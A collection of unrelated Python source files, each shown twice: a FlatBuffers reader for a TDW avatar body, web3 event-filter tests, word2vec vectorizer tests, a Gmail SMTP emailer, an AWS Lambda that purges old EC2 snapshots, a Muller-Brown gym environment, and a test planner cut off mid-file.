tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(14)) if o != 0: x = o + self._tab.Pos from .Vector3 import Vector3 obj = Vector3() obj.Init(self._tab.Bytes, x) return obj return None # AvatarSimpleBody def Mass(self): o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(16)) if o != 0: return self._tab.Get(tdw.flatbuffers.number_types.Float32Flags, o + self._tab.Pos) return 0.0 # AvatarSimpleBody def Sleeping(self): o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(18)) if o != 0: return bool(self._tab.Get(tdw.flatbuffers.number_types.BoolFlags, o + self._tab.Pos)) return False # AvatarSimpleBody def VisibleBody(self): o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(20)) if o != 0: return self._tab.String(o + self._tab.Pos) return None def AvatarSimpleBodyStart(builder): builder.StartObject(9) def AvatarSimpleBodyAddId(builder, id): builder.PrependUOffsetTRelativeSlot(0, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(id), 0) def AvatarSimpleBodyAddPosition(builder, position): builder.PrependStructSlot(1, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(position), 0) def AvatarSimpleBodyAddRotation(builder, rotation): builder.PrependStructSlot(2, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(rotation), 0) def AvatarSimpleBodyAddForward(builder, forward): builder.PrependStructSlot(3, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(forward), 0) def AvatarSimpleBodyAddVelocity(builder, velocity): builder.PrependStructSlot(4, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(velocity), 0) def AvatarSimpleBodyAddAngularVelocity(builder, angularVelocity): builder.PrependStructSlot(5, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(angularVelocity), 0) def AvatarSimpleBodyAddMass(builder, mass): builder.PrependFloat32Slot(6, mass, 0.0) def AvatarSimpleBodyAddSleeping(builder, sleeping): builder.PrependBoolSlot(7, sleeping, 0) def AvatarSimpleBodyAddVisibleBody(builder, visibleBody): builder.PrependUOffsetTRelativeSlot(8, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(visibleBody), 0) def AvatarSimpleBodyEnd(builder): return builder.EndObject()
Python/tdw/FBOutput/AvatarSimpleBody.py
# namespace: FBOutput import tdw.flatbuffers class AvatarSimpleBody(object): __slots__ = ['_tab'] @classmethod def GetRootAsAvatarSimpleBody(cls, buf, offset): n = tdw.flatbuffers.encode.Get(tdw.flatbuffers.packer.uoffset, buf, offset) x = AvatarSimpleBody() x.Init(buf, n + offset) return x # AvatarSimpleBody def Init(self, buf, pos): self._tab = tdw.flatbuffers.table.Table(buf, pos) # AvatarSimpleBody def Id(self): o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4)) if o != 0: return self._tab.String(o + self._tab.Pos) return None # AvatarSimpleBody def Position(self): o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6)) if o != 0: x = o + self._tab.Pos from .Vector3 import Vector3 obj = Vector3() obj.Init(self._tab.Bytes, x) return obj return None # AvatarSimpleBody def Rotation(self): o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8)) if o != 0: x = o + self._tab.Pos from .Quaternion import Quaternion obj = Quaternion() obj.Init(self._tab.Bytes, x) return obj return None # AvatarSimpleBody def Forward(self): o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10)) if o != 0: x = o + self._tab.Pos from .Vector3 import Vector3 obj = Vector3() obj.Init(self._tab.Bytes, x) return obj return None # AvatarSimpleBody def Velocity(self): o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12)) if o != 0: x = o + self._tab.Pos from .Vector3 import Vector3 obj = Vector3() obj.Init(self._tab.Bytes, x) return obj return None # AvatarSimpleBody def AngularVelocity(self): o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(14)) if o != 0: x = o + self._tab.Pos from .Vector3 import Vector3 obj = Vector3() obj.Init(self._tab.Bytes, x) return obj return None # AvatarSimpleBody def Mass(self): o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(16)) if o != 0: return self._tab.Get(tdw.flatbuffers.number_types.Float32Flags, o + self._tab.Pos) return 0.0 # AvatarSimpleBody def Sleeping(self): o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(18)) if o != 0: return bool(self._tab.Get(tdw.flatbuffers.number_types.BoolFlags, o + self._tab.Pos)) return False # AvatarSimpleBody def VisibleBody(self): o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(20)) if o != 0: return self._tab.String(o + self._tab.Pos) return None def AvatarSimpleBodyStart(builder): builder.StartObject(9) def AvatarSimpleBodyAddId(builder, id): builder.PrependUOffsetTRelativeSlot(0, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(id), 0) def AvatarSimpleBodyAddPosition(builder, position): builder.PrependStructSlot(1, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(position), 0) def AvatarSimpleBodyAddRotation(builder, rotation): builder.PrependStructSlot(2, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(rotation), 0) def AvatarSimpleBodyAddForward(builder, forward): builder.PrependStructSlot(3, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(forward), 0) def AvatarSimpleBodyAddVelocity(builder, velocity): builder.PrependStructSlot(4, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(velocity), 0) def AvatarSimpleBodyAddAngularVelocity(builder, angularVelocity): builder.PrependStructSlot(5, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(angularVelocity), 0) def AvatarSimpleBodyAddMass(builder, mass): builder.PrependFloat32Slot(6, mass, 0.0) def AvatarSimpleBodyAddSleeping(builder, sleeping): builder.PrependBoolSlot(7, sleeping, 0) def AvatarSimpleBodyAddVisibleBody(builder, visibleBody): builder.PrependUOffsetTRelativeSlot(8, tdw.flatbuffers.number_types.UOffsetTFlags.py_type(visibleBody), 0) def AvatarSimpleBodyEnd(builder): return builder.EndObject()
0.620047
0.235366
import pytest from eth_abi.exceptions import ( ValueOutOfBounds, ) from hypothesis import ( given, strategies as st, ) from web3._utils.events import ( DataArgumentFilter, TopicArgumentFilter, normalize_topic_list, ) @pytest.mark.parametrize( "topic_list,expected", ( ( ("0x1", "0x2", ["0x3"], None, "0x4", None, None, None), ("0x1", "0x2", "0x3", None, "0x4") ), ( (None, ["0x2", "0x2a"], "0x3", None, "0x4", None, [None], None), (None, ["0x2", "0x2a"], "0x3", None, "0x4") ), ( (None, None, [None]), tuple() ) ) ) def test_normalize_topic_list(topic_list, expected): assert normalize_topic_list(topic_list) == expected @given(st.text()) def test_match_single_string_type_properties_data_arg(value): data_filter = DataArgumentFilter(arg_type="string") data_filter.match_single(value) @given(st.text()) def test_match_single_string_type_properties_topic_arg(w3, value): topic_filter = TopicArgumentFilter(arg_type="string", abi_codec=w3.codec) topic_filter.match_single(value) @given(st.lists(elements=st.text(), max_size=10, min_size=0)) def test_match_any_string_type_properties(w3, values): topic_filter = TopicArgumentFilter(arg_type="string", abi_codec=w3.codec) topic_filter.match_any(*values) assert len(topic_filter.match_values) == len(values) @given(st.lists(elements=st.binary(), max_size=10, min_size=0)) def test_match_any_bytes_type_properties(w3, values): topic_filter = TopicArgumentFilter(arg_type="bytes", abi_codec=w3.codec) topic_filter.match_any(*values) assert len(topic_filter.match_values) == len(values) @given(st.lists(elements=st.binary(), max_size=10, min_size=1)) def test_match_any_bytes_type_properties_strict(w3_strict_abi, values): topic_filter = TopicArgumentFilter(arg_type="bytes", abi_codec=w3_strict_abi.codec) topic_filter.match_any(*values) assert len(topic_filter.match_values) == len(values) def test_match_hex_type_properties_strict(w3_strict_abi): topic_filter = TopicArgumentFilter(arg_type="bytes2", abi_codec=w3_strict_abi.codec) topic_filter.match_any("0x1233") assert len(topic_filter.match_values) == 1 @pytest.mark.parametrize("values", (b"123", b"1", "0x12", "0x", "0x121212")) def test_match_any_bytes_type_properties_strict_errors(w3_strict_abi, values): topic_filter = TopicArgumentFilter(arg_type="bytes2", abi_codec=w3_strict_abi.codec) topic_filter.match_any(values) with pytest.raises(ValueOutOfBounds): topic_filter.match_values
tests/core/utilities/test_event_filter_builder.py
import pytest from eth_abi.exceptions import ( ValueOutOfBounds, ) from hypothesis import ( given, strategies as st, ) from web3._utils.events import ( DataArgumentFilter, TopicArgumentFilter, normalize_topic_list, ) @pytest.mark.parametrize( "topic_list,expected", ( ( ("0x1", "0x2", ["0x3"], None, "0x4", None, None, None), ("0x1", "0x2", "0x3", None, "0x4") ), ( (None, ["0x2", "0x2a"], "0x3", None, "0x4", None, [None], None), (None, ["0x2", "0x2a"], "0x3", None, "0x4") ), ( (None, None, [None]), tuple() ) ) ) def test_normalize_topic_list(topic_list, expected): assert normalize_topic_list(topic_list) == expected @given(st.text()) def test_match_single_string_type_properties_data_arg(value): data_filter = DataArgumentFilter(arg_type="string") data_filter.match_single(value) @given(st.text()) def test_match_single_string_type_properties_topic_arg(w3, value): topic_filter = TopicArgumentFilter(arg_type="string", abi_codec=w3.codec) topic_filter.match_single(value) @given(st.lists(elements=st.text(), max_size=10, min_size=0)) def test_match_any_string_type_properties(w3, values): topic_filter = TopicArgumentFilter(arg_type="string", abi_codec=w3.codec) topic_filter.match_any(*values) assert len(topic_filter.match_values) == len(values) @given(st.lists(elements=st.binary(), max_size=10, min_size=0)) def test_match_any_bytes_type_properties(w3, values): topic_filter = TopicArgumentFilter(arg_type="bytes", abi_codec=w3.codec) topic_filter.match_any(*values) assert len(topic_filter.match_values) == len(values) @given(st.lists(elements=st.binary(), max_size=10, min_size=1)) def test_match_any_bytes_type_properties_strict(w3_strict_abi, values): topic_filter = TopicArgumentFilter(arg_type="bytes", abi_codec=w3_strict_abi.codec) topic_filter.match_any(*values) assert len(topic_filter.match_values) == len(values) def test_match_hex_type_properties_strict(w3_strict_abi): topic_filter = TopicArgumentFilter(arg_type="bytes2", abi_codec=w3_strict_abi.codec) topic_filter.match_any("0x1233") assert len(topic_filter.match_values) == 1 @pytest.mark.parametrize("values", (b"123", b"1", "0x12", "0x", "0x121212")) def test_match_any_bytes_type_properties_strict_errors(w3_strict_abi, values): topic_filter = TopicArgumentFilter(arg_type="bytes2", abi_codec=w3_strict_abi.codec) topic_filter.match_any(values) with pytest.raises(ValueOutOfBounds): topic_filter.match_values
0.501953
0.560403
import os from unittest import TestCase from unittest.mock import MagicMock, patch import gensim from word_vectorizer.models.model_data import ModelData from word_vectorizer.models.word2vec_vectorizer import Word2VecVectorizer class TestWord2VecVectorizer(TestCase): FOLDER_FOR_MODELS = os.path.join(os.path.dirname(os.path.realpath( __file__)), "testmodels") NAME_W2V_FILE_NON_BINARY = "test.non.binary.txt" NAME_W2V_FILE_BINARY = "test.binary.bin" PATH_TO_NON_BINARY_MODEL = os.path.join(FOLDER_FOR_MODELS, NAME_W2V_FILE_NON_BINARY) PATH_TO_BINARY_MODEL = os.path.join(FOLDER_FOR_MODELS, NAME_W2V_FILE_NON_BINARY) WORDS_IN_MODEL = ["hola", "adios"] SIZE_VECTORS = 4 @patch(Word2VecVectorizer.__module__ + ".KeyedVectors") @patch(Word2VecVectorizer.__module__ + ".get_tmpfile") def test_create_model_non_binary_OK(self, mock_get_tempfile, mock_word2vec): mock_model_data = MagicMock(ModelData) mock_model_data.binary = False mock_word2vec.return_value = MagicMock(gensim.models.Word2Vec) w2v_model = Word2VecVectorizer(mock_model_data, self.PATH_TO_NON_BINARY_MODEL) mock_get_tempfile.assert_called_once_with( self.PATH_TO_NON_BINARY_MODEL) mock_word2vec.load_word2vec_format.assert_called_once_with( mock_get_tempfile.return_value, binary=mock_model_data.binary) self.assertEqual(mock_word2vec.load_word2vec_format.return_value, w2v_model.model) @patch(Word2VecVectorizer.__module__ + ".KeyedVectors") @patch(Word2VecVectorizer.__module__ + ".get_tmpfile") def test_create_model_binary_OK(self, mock_get_tempfile, mock_word2vec): mock_model_data = MagicMock(ModelData) mock_model_data.binary = True mock_word2vec.return_value = MagicMock(gensim.models.Word2Vec) w2v_model = Word2VecVectorizer(mock_model_data, self.PATH_TO_BINARY_MODEL) mock_get_tempfile.assert_called_once_with( self.PATH_TO_BINARY_MODEL) mock_word2vec.load_word2vec_format.assert_called_once_with( mock_get_tempfile.return_value, binary=mock_model_data.binary) self.assertEqual(mock_word2vec.load_word2vec_format.return_value, w2v_model.model)
word_vectorizer/tests/unittest/models/test_word2VecVectorizer.py
import os from unittest import TestCase from unittest.mock import MagicMock, patch import gensim from word_vectorizer.models.model_data import ModelData from word_vectorizer.models.word2vec_vectorizer import Word2VecVectorizer class TestWord2VecVectorizer(TestCase): FOLDER_FOR_MODELS = os.path.join(os.path.dirname(os.path.realpath( __file__)), "testmodels") NAME_W2V_FILE_NON_BINARY = "test.non.binary.txt" NAME_W2V_FILE_BINARY = "test.binary.bin" PATH_TO_NON_BINARY_MODEL = os.path.join(FOLDER_FOR_MODELS, NAME_W2V_FILE_NON_BINARY) PATH_TO_BINARY_MODEL = os.path.join(FOLDER_FOR_MODELS, NAME_W2V_FILE_NON_BINARY) WORDS_IN_MODEL = ["hola", "adios"] SIZE_VECTORS = 4 @patch(Word2VecVectorizer.__module__ + ".KeyedVectors") @patch(Word2VecVectorizer.__module__ + ".get_tmpfile") def test_create_model_non_binary_OK(self, mock_get_tempfile, mock_word2vec): mock_model_data = MagicMock(ModelData) mock_model_data.binary = False mock_word2vec.return_value = MagicMock(gensim.models.Word2Vec) w2v_model = Word2VecVectorizer(mock_model_data, self.PATH_TO_NON_BINARY_MODEL) mock_get_tempfile.assert_called_once_with( self.PATH_TO_NON_BINARY_MODEL) mock_word2vec.load_word2vec_format.assert_called_once_with( mock_get_tempfile.return_value, binary=mock_model_data.binary) self.assertEqual(mock_word2vec.load_word2vec_format.return_value, w2v_model.model) @patch(Word2VecVectorizer.__module__ + ".KeyedVectors") @patch(Word2VecVectorizer.__module__ + ".get_tmpfile") def test_create_model_binary_OK(self, mock_get_tempfile, mock_word2vec): mock_model_data = MagicMock(ModelData) mock_model_data.binary = True mock_word2vec.return_value = MagicMock(gensim.models.Word2Vec) w2v_model = Word2VecVectorizer(mock_model_data, self.PATH_TO_BINARY_MODEL) mock_get_tempfile.assert_called_once_with( self.PATH_TO_BINARY_MODEL) mock_word2vec.load_word2vec_format.assert_called_once_with( mock_get_tempfile.return_value, binary=mock_model_data.binary) self.assertEqual(mock_word2vec.load_word2vec_format.return_value, w2v_model.model)
0.46952
0.273527
import smtplib import re import redis class Emailer: """ Function description : sends an email given certain details patterned from http://stackoverflow.com/questions/10147455/trying-to-send-email-gmail-as-mail-provider-using-python Parameters: details -> a dictionary that contains user info and email ifo attributes: sender -> the email address that will send the email recipients -> a list of email addresses that the email will be sent to subject -> subject of the email text -> the content of the message body username -> the username of the account that will send the email password -> the password of the account that will send the email """ def send_email(self,details): msg = """ \From: %s\nTo: %s\nSubject: %s\n\n%s """ % (details['sender'],", ".join(details['recipients']),details['subject'],details['text']) try: #initialize an email server at gmail using smtp protocol server = smtplib.SMTP('smtp.gmail.com:587') server.ehlo() #put the smtp server in transport layer security mode server.starttls() #login to the email account using email-password combination server.login(details['username'],details['password']) #send the email server.sendmail(details['sender'],details['recipients'],msg) #server.quit() server.close() return 'mail sent' except smtplib.SMTPAuthenticationError: return 'invalid username-password combination' except: return 'failed to send mail' def run(self,input): r = redis.StrictRedis(host='localhost',port=6379,db=0) method_checker = re.match(r'banana\s+emailer\s+(\S*)',input) response = 'default' if(method_checker.group(1) == 'send'): """ syntax : banana emailer send <sending email> <receiving email/s> <subject in quotes> <body in quotes> <password in quotes> """ parser = re.match(r'banana\s+emailer\s+send\s+([^@]+@[^@]+\.[^@]+)\s+([^@]+@[^@]+\.[^@]+)\s+"(.*)"\s+"(.*)"\s+"(.*)"',input) if parser: receiving = parser.group(2).split(',') details = {'sender' : parser.group(1),'recipients' : receiving,'subject' : parser.group(3),'text' : parser.group(4),'username' : parser.group(1),'password' : <PASSWORD>(5)} print 'Please wait. Sending email.\n' response = self.send_email(details) return response else: response = 'Wrong set of Parameters!\n' else: response = 'Function not found!\n' return response
modules/emailer/emailer.py
import smtplib import re import redis class Emailer: """ Function description : sends an email given certain details patterned from http://stackoverflow.com/questions/10147455/trying-to-send-email-gmail-as-mail-provider-using-python Parameters: details -> a dictionary that contains user info and email ifo attributes: sender -> the email address that will send the email recipients -> a list of email addresses that the email will be sent to subject -> subject of the email text -> the content of the message body username -> the username of the account that will send the email password -> the password of the account that will send the email """ def send_email(self,details): msg = """ \From: %s\nTo: %s\nSubject: %s\n\n%s """ % (details['sender'],", ".join(details['recipients']),details['subject'],details['text']) try: #initialize an email server at gmail using smtp protocol server = smtplib.SMTP('smtp.gmail.com:587') server.ehlo() #put the smtp server in transport layer security mode server.starttls() #login to the email account using email-password combination server.login(details['username'],details['password']) #send the email server.sendmail(details['sender'],details['recipients'],msg) #server.quit() server.close() return 'mail sent' except smtplib.SMTPAuthenticationError: return 'invalid username-password combination' except: return 'failed to send mail' def run(self,input): r = redis.StrictRedis(host='localhost',port=6379,db=0) method_checker = re.match(r'banana\s+emailer\s+(\S*)',input) response = 'default' if(method_checker.group(1) == 'send'): """ syntax : banana emailer send <sending email> <receiving email/s> <subject in quotes> <body in quotes> <password in quotes> """ parser = re.match(r'banana\s+emailer\s+send\s+([^@]+@[^@]+\.[^@]+)\s+([^@]+@[^@]+\.[^@]+)\s+"(.*)"\s+"(.*)"\s+"(.*)"',input) if parser: receiving = parser.group(2).split(',') details = {'sender' : parser.group(1),'recipients' : receiving,'subject' : parser.group(3),'text' : parser.group(4),'username' : parser.group(1),'password' : <PASSWORD>(5)} print 'Please wait. Sending email.\n' response = self.send_email(details) return response else: response = 'Wrong set of Parameters!\n' else: response = 'Function not found!\n' return response
0.237576
0.235988
import os import boto3 import logging import datetime import re import time __author__ = '<NAME> (<EMAIL>)' __copyright__ = 'Shine Solutions' __license__ = 'Apache License, Version 2.0' # setting up logger logger = logging.getLogger(__name__) logger.setLevel(int(os.getenv('LOG_LEVEL', logging.INFO))) def purge_old_snapshots(params): filters = [ { 'Name': 'status', 'Values': ['completed'] } ] if 'StackPrefix' in params: filters.append({ 'Name': 'tag:StackPrefix', 'Values': [params['StackPrefix']] }) else: filters.append({ 'Name': 'tag-key', 'Values': ['StackPrefix'] }) filters.append( { 'Name': 'tag:SnapshotType', 'Values': [params['SnapshotType']] } ) filters.append( { 'Name': 'tag:AemId', 'Values': ['author', 'publish'] } ) # snapshots is a list snapshots = boto3.resource('ec2').snapshots.filter(Filters=filters) quantity = params['Age'][:-1] unit = params['Age'][-1] if unit == 'd': delta = datetime.timedelta(days=int(quantity)) elif unit == 'h': delta = datetime.timedelta(hours=int(quantity)) elif unit == 'w': delta = datetime.timedelta(weeks=int(quantity)) else: raise RuntimeError('Unsupported time unit') now = datetime.datetime.utcnow() old_snapshots = [snapshot for snapshot in snapshots if (now - snapshot.start_time.replace(tzinfo=None)) > delta] logger.info('Deleting {} {} snapshots older than {}'.format(len(old_snapshots), params['SnapshotType'], delta)) for snapshot in old_snapshots: print(('Deleting snapshot {}'.format(snapshot.snapshot_id))) snapshot.delete() time.sleep(0.5) def handler(event, context): if 'SnapshotType' not in event or event['SnapshotType'] not in ['live', 'offline', 'orchestration']: logger.error('SnapshotType [live|offline] must be specified') raise RuntimeError('\'SnapshotType\' is expected in inputs and have value of \'live\', \'offline\', or \'orchestration\'') if 'Age' not in event or not re.match(r'^\d+[hdw]$', event['Age'], re.I): logger.error('Age must be specified in xx[h|d|m] format') raise RuntimeError('\'Age\' is expected in inputs and in correct format') purge_old_snapshots(event)
lambda/purge_snapshots.py
import os import boto3 import logging import datetime import re import time __author__ = '<NAME> (<EMAIL>)' __copyright__ = 'Shine Solutions' __license__ = 'Apache License, Version 2.0' # setting up logger logger = logging.getLogger(__name__) logger.setLevel(int(os.getenv('LOG_LEVEL', logging.INFO))) def purge_old_snapshots(params): filters = [ { 'Name': 'status', 'Values': ['completed'] } ] if 'StackPrefix' in params: filters.append({ 'Name': 'tag:StackPrefix', 'Values': [params['StackPrefix']] }) else: filters.append({ 'Name': 'tag-key', 'Values': ['StackPrefix'] }) filters.append( { 'Name': 'tag:SnapshotType', 'Values': [params['SnapshotType']] } ) filters.append( { 'Name': 'tag:AemId', 'Values': ['author', 'publish'] } ) # snapshots is a list snapshots = boto3.resource('ec2').snapshots.filter(Filters=filters) quantity = params['Age'][:-1] unit = params['Age'][-1] if unit == 'd': delta = datetime.timedelta(days=int(quantity)) elif unit == 'h': delta = datetime.timedelta(hours=int(quantity)) elif unit == 'w': delta = datetime.timedelta(weeks=int(quantity)) else: raise RuntimeError('Unsupported time unit') now = datetime.datetime.utcnow() old_snapshots = [snapshot for snapshot in snapshots if (now - snapshot.start_time.replace(tzinfo=None)) > delta] logger.info('Deleting {} {} snapshots older than {}'.format(len(old_snapshots), params['SnapshotType'], delta)) for snapshot in old_snapshots: print(('Deleting snapshot {}'.format(snapshot.snapshot_id))) snapshot.delete() time.sleep(0.5) def handler(event, context): if 'SnapshotType' not in event or event['SnapshotType'] not in ['live', 'offline', 'orchestration']: logger.error('SnapshotType [live|offline] must be specified') raise RuntimeError('\'SnapshotType\' is expected in inputs and have value of \'live\', \'offline\', or \'orchestration\'') if 'Age' not in event or not re.match(r'^\d+[hdw]$', event['Age'], re.I): logger.error('Age must be specified in xx[h|d|m] format') raise RuntimeError('\'Age\' is expected in inputs and in correct format') purge_old_snapshots(event)
0.269133
0.152631
import gym import numpy as np import matplotlib.pyplot as plt from itertools import product from gym import error, spaces, utils from gym.utils import seeding class MullerBrownContinuousEnv(gym.Env): metadata = {'render.modes': ['human']} def __init__(self): # state space self.x_min = -1.5 self.x_max = 1.0 self.y_min = -0.5 self.y_max = 2.0 self.observation_space = spaces.Box(low=np.array([self.x_min,self.y_min]), high=np.array([self.x_max,self.y_max]), dtype=float) # action space self.action_min = -1 self.action_max = 1 self.action_space = spaces.Box(low=self.action_min, high=self.action_max,shape=(2,),dtype=float) # precompute some energies for plotting PES self.grid_points = 60 self.energies = np.empty((self.grid_points,self.grid_points)) x = np.linspace(self.x_min,self.x_max,self.grid_points) y = np.linspace(self.y_min,self.y_max,self.grid_points) for ix,iy in product(range(self.grid_points),range(self.grid_points)): self.energies[ix,iy] = self.energy((x[ix],y[iy])) self.reset() def plotPES(self): ''' Renders the continuous Muller Brown PES (environment) ''' x = np.linspace(self.x_min,self.x_max,self.grid_points) y = np.linspace(self.y_min,self.y_max,self.grid_points) fig,ax = plt.subplots() im = plt.pcolormesh(x,y,self.energies.T, cmap='GnBu_r', vmax=10,shading='nearest') ax.set_aspect('equal') cbar = fig.colorbar(im, ax=ax) plt.xlabel('x') plt.ylabel('y') cbar.set_label('energy') return fig def render(self, mode='human'): self.plotPES() x,y = self.agent_position plt.plot(x,y,marker='o',color='#C91A09',markersize=8) def energy(self, state): ''' Muller-Brown potential energy surface Parameters: state : integer pair (ix,iy) from state energy : float ''' x,y = state A = [-200, -100, -170, 15] a = [-1, -1, -6.5, 0.7] b = [0, 0, 11, 0.6] c = [-10, -10, -6.5, 0.7] x0 = [1, 0, -0.5, -1] y0 = [0, 0.5, 1.5, 1] energy = 0.0 for k in range(len(x0)): energy += (A[k]) *\ np.exp(a[k]*(x-x0[k])**2 +\ b[k]*(x-x0[k])*(y-y0[k]) +\ c[k]*(y-y0[k])**2) return energy def set_state(self, state): self.agent_position = state def is_off_grid(self, state): x,y = state if (x >= self.x_max) or (x <= self.x_min): return True elif (y >= self.y_max) or (y <= self.y_min): return True else: return False def step(self, action): old_energy = self.energy(self.agent_position) new_state = self.agent_position + 0.2*action done = False # we don't have a pre-set endpoint if not self.is_off_grid(new_state): self.set_state(new_state) new_energy = self.energy(new_state) reward = old_energy - new_energy return new_state, reward, done, {} else: reward = -1e2 # penalize off-grid moves return self.agent_position, reward, done, {} def reset(self): new_position = self.observation_space.sample() self.set_state(new_position) return self.agent_position if __name__ == '__main__': env = MullerBrownContinuousEnv() for _ in range(10): obs,reward,_,_ = env.step(env.action_space.sample()) print(obs,reward) env.render() plt.pause(0.01) plt.close()
gym_muller_brown/envs/muller_brown_continuous.py
import gym import numpy as np import matplotlib.pyplot as plt from itertools import product from gym import error, spaces, utils from gym.utils import seeding class MullerBrownContinuousEnv(gym.Env): metadata = {'render.modes': ['human']} def __init__(self): # state space self.x_min = -1.5 self.x_max = 1.0 self.y_min = -0.5 self.y_max = 2.0 self.observation_space = spaces.Box(low=np.array([self.x_min,self.y_min]), high=np.array([self.x_max,self.y_max]), dtype=float) # action space self.action_min = -1 self.action_max = 1 self.action_space = spaces.Box(low=self.action_min, high=self.action_max,shape=(2,),dtype=float) # precompute some energies for plotting PES self.grid_points = 60 self.energies = np.empty((self.grid_points,self.grid_points)) x = np.linspace(self.x_min,self.x_max,self.grid_points) y = np.linspace(self.y_min,self.y_max,self.grid_points) for ix,iy in product(range(self.grid_points),range(self.grid_points)): self.energies[ix,iy] = self.energy((x[ix],y[iy])) self.reset() def plotPES(self): ''' Renders the continuous Muller Brown PES (environment) ''' x = np.linspace(self.x_min,self.x_max,self.grid_points) y = np.linspace(self.y_min,self.y_max,self.grid_points) fig,ax = plt.subplots() im = plt.pcolormesh(x,y,self.energies.T, cmap='GnBu_r', vmax=10,shading='nearest') ax.set_aspect('equal') cbar = fig.colorbar(im, ax=ax) plt.xlabel('x') plt.ylabel('y') cbar.set_label('energy') return fig def render(self, mode='human'): self.plotPES() x,y = self.agent_position plt.plot(x,y,marker='o',color='#C91A09',markersize=8) def energy(self, state): ''' Muller-Brown potential energy surface Parameters: state : integer pair (ix,iy) from state energy : float ''' x,y = state A = [-200, -100, -170, 15] a = [-1, -1, -6.5, 0.7] b = [0, 0, 11, 0.6] c = [-10, -10, -6.5, 0.7] x0 = [1, 0, -0.5, -1] y0 = [0, 0.5, 1.5, 1] energy = 0.0 for k in range(len(x0)): energy += (A[k]) *\ np.exp(a[k]*(x-x0[k])**2 +\ b[k]*(x-x0[k])*(y-y0[k]) +\ c[k]*(y-y0[k])**2) return energy def set_state(self, state): self.agent_position = state def is_off_grid(self, state): x,y = state if (x >= self.x_max) or (x <= self.x_min): return True elif (y >= self.y_max) or (y <= self.y_min): return True else: return False def step(self, action): old_energy = self.energy(self.agent_position) new_state = self.agent_position + 0.2*action done = False # we don't have a pre-set endpoint if not self.is_off_grid(new_state): self.set_state(new_state) new_energy = self.energy(new_state) reward = old_energy - new_energy return new_state, reward, done, {} else: reward = -1e2 # penalize off-grid moves return self.agent_position, reward, done, {} def reset(self): new_position = self.observation_space.sample() self.set_state(new_position) return self.agent_position if __name__ == '__main__': env = MullerBrownContinuousEnv() for _ in range(10): obs,reward,_,_ = env.step(env.action_space.sample()) print(obs,reward) env.render() plt.pause(0.01) plt.close()
0.685739
0.386706
from . import testcases from testing.testcases import tc_path_plan_a_star as testcase from logger.logger import logger import time class test_planner(object): ''' classdocs ''' def __init__(self): ''' Constructor ''' self.list_tc = {} self.list_tc_init={} self.logger = logger("test_planner") self.results = [] def get_available_testcases(self): """ append all testcases to the tc_list """ self.list_tc = testcases.get_available_tc() for key in self.list_tc.keys(): self.list_tc_init[key] = self.list_tc[key]() def run(self): """ runs all the registered testcases """ for tc_key in self.list_tc.keys(): self.logger.write_log("-------------------------------------------------") self.logger.write_log("running testcase: " + tc_key) starttime = time.time() tc_obj = self.list_tc_init[tc_key] tc_class = self.list_tc[tc_key] preCon_keys = [] testStep_keys = [] postCon_keys = [] for m_key in tc_class.__dict__.keys(): if m_key.find("precondition") != -1: preCon_keys.append(m_key) elif m_key.find("teststep") != -1: testStep_keys.append(m_key) elif m_key.find("postcondition") != -1: testStep_keys.append(m_key) # sort the teststeps preCon_keys.sort() testStep_keys.sort() postCon_keys.sort() self.logger.write_log("-------------------------------------------------") self.logger.write_log("running precondition: " + tc_key) for preCon in preCon_keys: self.logger.write_log("running precondition: " + preCon + "\n") tc_class.__dict__[preCon](tc_obj) self.logger.write_log("-------------------------------------------------") self.logger.write_log("running teststeps: " + tc_key) for teststep in testStep_keys: self.logger.write_log("running teststep: " + teststep + "\n") tc_class.__dict__[teststep](tc_obj) self.logger.write_log("-------------------------------------------------") self.logger.write_log("running postcondition: " + tc_key) for postCon in postCon_keys: self.logger.write_log("running postcondition: " + postCon + "\n") tc_class.__dict__[postCon](tc_obj) duration = time.time()-starttime self.logger.write_log("-------------------------------------------------") self.logger.write_log("finished testcase: " + tc_key +" in " +str(duration)[:6]) self.results.append({"name":tc_key, "duration":duration,"result":False}) return self.results
src/testing/test_planner.py
from . import testcases from testing.testcases import tc_path_plan_a_star as testcase from logger.logger import logger import time class test_planner(object): ''' classdocs ''' def __init__(self): ''' Constructor ''' self.list_tc = {} self.list_tc_init={} self.logger = logger("test_planner") self.results = [] def get_available_testcases(self): """ append all testcases to the tc_list """ self.list_tc = testcases.get_available_tc() for key in self.list_tc.keys(): self.list_tc_init[key] = self.list_tc[key]() def run(self): """ runs all the registered testcases """ for tc_key in self.list_tc.keys(): self.logger.write_log("-------------------------------------------------") self.logger.write_log("running testcase: " + tc_key) starttime = time.time() tc_obj = self.list_tc_init[tc_key] tc_class = self.list_tc[tc_key] preCon_keys = [] testStep_keys = [] postCon_keys = [] for m_key in tc_class.__dict__.keys(): if m_key.find("precondition") != -1: preCon_keys.append(m_key) elif m_key.find("teststep") != -1: testStep_keys.append(m_key) elif m_key.find("postcondition") != -1: testStep_keys.append(m_key) # sort the teststeps preCon_keys.sort() testStep_keys.sort() postCon_keys.sort() self.logger.write_log("-------------------------------------------------") self.logger.write_log("running 